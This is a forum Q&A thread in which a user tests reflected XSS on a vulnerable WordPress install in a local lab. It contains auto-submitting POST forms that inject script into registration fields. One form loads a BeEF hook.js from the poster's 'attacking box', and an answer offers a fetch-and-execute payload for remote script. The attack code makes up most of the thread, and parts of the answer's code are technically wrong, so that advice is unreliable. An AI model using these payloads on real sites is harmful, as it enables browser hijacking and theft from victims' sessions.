# Loading external JS script in POST parameter (XSS Reflected attack)

Tags: javascript, xss

I'm testing on my vbox machines some xss attacks, **just for fun**!
I have two .html files one works and the other not.

The file which works is:

```
<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
```

**http://192.168.56.17** is the OWASPBWA machines of vulnhub, which is installed an old WP installation with XSS flaw on register.php

This works. If i call this .html file from another client, let me say 192.168.56.1,for example, **i see the javascript alert!**

But if i try something nasty, for example hooking beef-xss, the follow code doesn't work:

```
<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='">example' />
<input type="hidden" name="user_email" id="user_email"
value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
```

**192.168.56.101** is my attacking box.

Thanks for helping

Comment: If you look in your browser's developer tools, is hook.js getting downloaded?

Comment: i see the beef cookie but you're right! .js is NOT downloaded.... both machines can communicate anyway, injection the beef hook with GET parameter works! so the problem is in my code utilizing POST

Answer (score 0):

in my opinion you should swap these 2 lines

```
<input type="hidden" name="user_login" id="user_login" value='">example' />
<input type="hidden" name="user_email" id="user_email" value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />
```

reasoning: the '">example' is breaking the code and allow the script tag to take precedence.

my other best guess is that,

```
<input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />
```

if the above code works then you might want to try the javascript exec("") command within the value attribute. i doubt if the script->src actually fetch the resource.

something likethis

```html
    <input type="hidden" name="user_login" id="user_login" value='"><script>
    fetch(&apos;location to your script:3000/hook.js &apos;)
      .then(
      response => {
        response.text()
          .then(a=> exec(a))
        
      }
      )</script>' />
```

**Explanation**:
fetch the script explictly via the fetch API, then execute the string via exec("")..
&apos &quot are escape chars for  ' and " respectively.

*thats the best i could think of.*

Comment: Thanks for helping. I tried swapping the 2 lines (already did but doesn't works) without success. So i tried your new code but it doesn't works.. the hook.js is still not downloaded.

Comment: scrap my above code , what i meant was make an external xhr request and replace the alert function, what i believe is the xhr will fetch the resource and exec() command would execute it. other way would be dump the whole script there in value="" tag

Comment: Ok, so write the code that you mean, otherwise i cannot understand.

Comment: i was telling that put the actual code between--> value='"><script>copy paste code here without doing http request</script>'

Comment: but i wish to do the http request... so is not possible to load .js in a POST parameter? just asking !

Comment: i dont think so... but if the page runs php, then you an put a  <?php code;> tag in it... to induce a CSS attack. refer [here](https://www.w3schools.com/php/php_form_validation.asp)